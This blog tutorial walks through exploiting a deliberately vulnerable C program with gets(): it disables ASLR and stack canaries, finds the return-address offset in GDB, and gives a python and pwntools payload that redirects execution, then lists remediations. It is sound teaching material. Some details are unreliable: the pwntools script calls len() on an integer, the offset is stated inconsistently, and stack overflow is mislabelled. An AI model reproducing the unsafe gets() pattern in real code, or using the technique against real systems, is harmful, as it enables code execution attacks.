Buffer Overflows – The Art of Stack Smashing
Introduction
In this blog post, we will explore the fundamental concepts of buffer overflows. I examine a vulnerable function written in C to understand the mechanics of exploiting this vulnerability, which allows attackers to take control of the program’s flow and execute arbitrary code.
Stacks and Registers
The stack is a fundamental data structure in computer memory used for storing temporary data during the execution of a program. It operates on a “Last-In-First-Out” (LIFO) basis, where the last item pushed into the stack is the first one to be popped out. The stack is vital for managing function calls and local variables in programs.
In the x86 architecture, the stack is managed using four primary registers:
- ESP (Extended Stack Pointer): Points to the top of the stack, and it is used for pushing and popping values.
- EBP (Extended Base Pointer): Used to access function arguments and local variables.
- EIP (Extended Instruction Pointer): Contains the address of the next instruction to be executed.
- EFLAGS: Contains flags that represent the current state of the processor, including the condition codes resulting from arithmetic and logical operations.
In x86_64 architecture, the register names are extended to 64 bits, such as RSP (64-bit Stack Pointer), RBP (64-bit Base Pointer), RIP (64-bit Instruction Pointer), and RFLAGS.
Understanding the Stack
In a stack grows downwards, which means that as items are pushed onto the stack, they are stored at lower memory addresses. The stack pointer (ESP) points to the top of the stack.
As items are push onto the stack, the stack pointer decrements, moving towards lower memory addresses.
When items are popped off, the stack pointer increments, moving towards higher memory addresses, and the top of the stack moves upwards.
Buffer Overflow Vulnerability
Buffer overflow vulnerability occurs when a program writes more data into a buffer (an array of fixed size) than it can hold. This extra data overflows into adjacent memory locations, potentially overwriting other data, including function return addresses and other critical information. By manipulating the data written into the buffer, attackers can take control of the program’s flow and execute arbitrary code.
Let’s look at a vulnerable function written in C that explains the vulnerability.
void vulnerable_function() {
char buffer[16];
printf("Enter your name: ");
gets(buffer); // This function is vulnerable to buffer overflow
printf("Hello, %s!\n", buffer);
}
The function gets()
reads input from the user and stores it in the buffer
without any bounds checking. If the input provided by the user is longer than the buffer size, it will overflow and overwrite adjacent memory.
Creating a Vulnerable Program
Using the above vulnerable function, let’s create a vulnerable program in C that uses gets()
function to read user input and display it back.
#include <stdio.h>
#include <string.h>
void secret_function() {
printf("Congratulations! You've successfully exploited the buffer overflow.\n");
}
void vulnerable_function() {
char buffer[16];
printf("Enter your name: ");
gets(buffer); // This function is vulnerable to buffer overflow
printf("Hello, %s!\n", buffer);
}
int main() {
vulnerable_function();
return 0;
}
Objective
We aim to exploit the buffer overflow vulnerability to execute the secret_function()
instead of returning to the main function as intended.
Disabling ASLR and Stack Canary
Address Space Layout Randomization (ASLR)
Address Space Layout Randomization (ASLR) is a security feature that randomizes the locations of program components in memory, making it harder for attackers to predict addresses and execute code.
Let’s see how enabling ASLR affects the address of stack pointer (ESP). To ensure ASLR is enabled, execute the following command:
echo 2 | sudo tee /proc/sys/kernel/randomize_va_space
To check the address ESP is pointing to, I saved and compiled the following code:
vi esp.c
#include <stdio.h>
void main() {
register int i asm("esp");
printf("$esp = %#010x\n", i);
}
gcc -o esp esp.c
./esp
./esp
./esp
As observed from the below image, the location of stack pointer is randomized when ASLR is enabled.
If the ASLR is disabled, the location of the stack pointer remains constant.
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
Most modern operating systems enable ASLR by default. To simplify our exploit process, we disable ASLR temporarily.
To disable ASLR, execute the following command:
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
Stack Canary
Stack protection, also known as Stack Canary, is another security mechanism that adds a random value (canary) between the buffer and the function’s return address. If the canary is overwritten during a buffer overflow, the program detects it as an attack and terminates. To exploit the vulnerability, we disable stack protection during compilation.
gcc -m32 -fno-stack-protector -z execstack vulnerable.c -o vulnerable
Since the protections have been disabled, the same can be confirmed using the checksec tool.
checksec ./vulnerable
Naive Execution of Vulnerable Binary
Upon passing simple and expected length inputs, the program behaves normally.
./vulnerable
Enter your name: Siddharth
However, when the length of the input drastically increases, the program throws a segmentation fault. A segmentation fault (segfault) occurs when a program attempts to access an invalid address or points to an area that is not allowed to be executed.
./vulnerable
Enter your name: Siddharthhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh
Analyzing the Binary using GDB
Exploits rarely work in the first attempt. Therefore, debugging tools like GDB are useful in understanding the behavior of the program in different test scenarios. In this case, we are interested in understanding where the crash occurs. The goal here is to overwrite the Instruction Pointer (EIP) to point to the address of the “secret_function”.
I am using Python Exploit Development Assistance (PEDA) for GDB to make the identification of offset easier.
# Install PEDA
git clone https://github.com/longld/peda.git ~/peda
echo "source ~/peda/peda.py" >> ~/.gdbinit
# Debug the binary
$ gdb -q ./vulnerable
Creating a Pattern
A sequence of unique characters help in identifying the exact location where the buffer overflow occurs. GDB-peda has an inbuilt feature to create patterns to determine the number of bytes required to reach and overwrite the instruction pointer (EIP or RIP) on the stack.
# Create pattern of length 50
gdb-peda$ pattern_create 50
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbA'
# Run the Binary
gdb-peda$ run
The buffer is overflown by the pattern bytes and the register values of Base Pointer (EBP), Stack Pointer (ESP), and Instruction (EIP) pointer are overwritten by the same pattern.
If the number of bytes required to reach and overwrite the Instruction Pointer can be calculated, we can inject the address of “secret_function” to make the stack call the function.
Finding the Offset
Once the program crashes or terminates with a segmentation fault, the pattern’s unique sequence will appear in the memory dump. By examining the memory dump or using a pattern matching tool such as pattern_offset
in GDB-peda, the exact offset (number of bytes) from the start of the buffer to the point where the unique pattern begins can be identified. This offset tells us how many bytes we need to overflow the buffer to reach the instruction pointer.
# Fetch location of $ESP
gdb-peda$ x/wx $esp
0xffffd630: 0x41412941
# Calculate offset
gdb-peda$ pattern_offset 0x41412941
1094789441 found at offset: 32
We’ve found the address of the stack pointer to be “0x41412941” and the pattern_offset to be 32. This means that we need 32 bytes of data to overwrite the instruction pointer. Precisely 28 bytes to reach the instruction pointer and the remaining 4 bytes of “secret_function” address.
Finding the Secret_Function Address
The function address can be found easily through GDB.
# Fetch address of secret_function
gdb-peda$ print secret_function
$1 = {<text variable, no debug info>} 0x565561b9 <secret_function>
gdb-peda$ info address secret_function
Symbol "secret_function" is at 0x565561b9 in a file compiled without debugging.
gdb-peda$
The secret_function exists at “0x565561b9” location.
Calculating the Payload
With the offset value known, you can now calculate the payload needed to exploit the vulnerability. The payload typically consists of a combination of junk data (e.g., 'A' * offset
) to fill the buffer until it reaches the return address (EIP or RIP), followed by the desired target address (e.g., the address of the secret function) to overwrite the return address with.
Therefore, the payload would be:
junk (28 bytes) + secret_function_address (4 bytes)
By overwriting the return address with the target address, you can control the flow of the program and redirect it to execute your chosen code, effectively achieving arbitrary code execution.
Crafting the Exploit
The payload can be passed through python to the binary.
python3 -c 'import sys;sys.stdout.buffer.write(b"\x41" * 28 + b"\xb9\x61\x55\x56")'|./vulnerable
Note that python3 print function behaves differently from python2. You might face encoding/codec issues while executing through the print function of python3. I used “sys.stdout.buffer.write()
” to overcome this problem.
Another way would be to use PwnTools to send the payload and receive the response.
from pwn import *
# Replace with the actual address of secret_function
secret_function_address = 0x565561b9
# Calculate the offset based on the address length
offset = 32
junk = b"A" * (offset - len(secret_function_address))
# Overwrite the return address
payload = junk + p32(secret_function_address) # Convert the address to Little Endian
# Connect to the vulnerable program
p = process('./vulnerable')
# Send the payload
p.sendline(payload)
# Receive and print the output
print(p.recvall().decode(errors='replace'))
We’ve successfully executed the “secret_function” by overwriting the Instruction Pointer with the address of “secret_function”.
Tricky Questions
Does an upward growing stack prevent Buffer Overflows?
No. Buffer overflows would still be possible even if the stack did not grow downward. The direction of stack growth does not fundamentally determine the existence or possibility of buffer overflow vulnerabilities. Buffer overflows occur when data is written beyond the intended boundaries of a buffer, leading to overwriting adjacent memory locations. The direction of stack growth only affects how the stack addresses are managed and how local variables and function call frames are organized in memory.
Are Buffer Overflow and Stack Overflow the same?
No, buffer overflow and stack overflow are not the same, but they are related concepts.
- Buffer Overflow refers to the condition when data is written outside the bounds of a buffer, overwriting adjacent memory locations. This can happen in both stack and heap memory regions.
- Stack Overflow is a specific type of buffer overflow that occurs on the stack memory. It occurs when a program’s call stack consumes more memory than the system has allocated for it.
Remediation
- Avoid using vulnerable methods in C such as
gets(), scanf(), strcpy(), strcat()
that do not perform any bounds checking. Instead, use secure methods such asfgets(), snprintf(), strncpy()
that ensure the buffer size is not exceeded. - Use modern techniques such as Address Space Layout Randomization (ASLR), Data Execution Prevention (DEP), Stack Canaries, Non-Executable Stack (NX), Bounds Checking, Safe String Functions, Stack Protector/Guard, and Software Sandboxing. It is essential to implement a combination these mitigations to create a strong defense against buffer overflow exploits.
References
- https://samsclass.info/127/proj/p3-lbuf1.htm